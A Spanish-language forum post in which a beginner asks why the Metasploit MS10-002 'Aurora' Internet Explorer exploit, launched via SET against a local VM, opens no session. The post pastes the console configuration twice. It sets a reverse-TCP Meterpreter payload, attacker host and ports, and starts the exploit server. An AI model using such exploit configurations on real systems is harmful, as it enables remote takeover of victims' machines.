Buenas tardes a todos,
Tengo un problema al ejecutar el exploit indicado del asunto. Estoy haciendo pruebas en local con una máquina virtual, en mi linux el server queda esperando y en la vm ejecuto la url en el navegador.
Tengo abierto el puerto 8001.
Antes de ejecutar 192.168.0.102:8080 tengo la consola "started":
resource (/root/.set/meta_config)> use windows/browser/ms10_002_aurora
resource (/root/.set/meta_config)> set PAYLOAD windows/meterpreter/reverse_tcp_dns
PAYLOAD => windows/meterpreter/reverse_tcp_dns
resource (/root/.set/meta_config)> set LHOST 192.168.0.102
LHOST => 192.168.0.102
resource (/root/.set/meta_config)> set LPORT 8001
LPORT => 8001
resource (/root/.set/meta_config)> set URIPATH /
URIPATH => /
resource (/root/.set/meta_config)> set SRVPORT 8080
SRVPORT => 8080
resource (/root/.set/meta_config)> set ExitOnSession false
ExitOnSession => false
resource (/root/.set/meta_config)> exploit -j
Tengo un problema al ejecutar el exploit indicado del asunto. Estoy haciendo pruebas en local con una máquina virtual, en mi linux el server queda esperando y en la vm ejecuto la url en el navegador.
Tengo abierto el puerto 8001.
Antes de ejecutar 192.168.0.102:8080 tengo la consola "started":
resource (/root/.set/meta_config)> use windows/browser/ms10_002_aurora
resource (/root/.set/meta_config)> set PAYLOAD windows/meterpreter/reverse_tcp_dns
PAYLOAD => windows/meterpreter/reverse_tcp_dns
resource (/root/.set/meta_config)> set LHOST 192.168.0.102
LHOST => 192.168.0.102
resource (/root/.set/meta_config)> set LPORT 8001
LPORT => 8001
resource (/root/.set/meta_config)> set URIPATH /
URIPATH => /
resource (/root/.set/meta_config)> set SRVPORT 8080
SRVPORT => 8080
resource (/root/.set/meta_config)> set ExitOnSession false
ExitOnSession => false
resource (/root/.set/meta_config)> exploit -j
- Exploit running as background job.
- Started reverse TCP handler on 192.168.0.102:8001
msf exploit(ms10_002_aurora) > - Using URL: http://0.0.0.0:8080/
- Local IP: http://192.168.0.102:8080/
- Server started.
Después de ejecutar: - 192.168.0.102 ms10_002_aurora - Sending MS10-002 Microsoft Internet Explorer "Aurora" Memory Corruption
- 192.168.0.102 ms10_002_aurora - Sending MS10-002 Microsoft Internet Explorer "Aurora" Memory Corruption
Busco sesiones activas y nada:
msf exploit(ms10_002_aurora) > sessions -i
Active sessions
===============
No active sessions.
¿Alguien me puede ayudar? Os comento que en el tema de exploit soy un poco novato, estoy leyendo mucho y empapandome de todo, por eso lo de mis pruebas locales.
Gracias a todos!!
Saludos.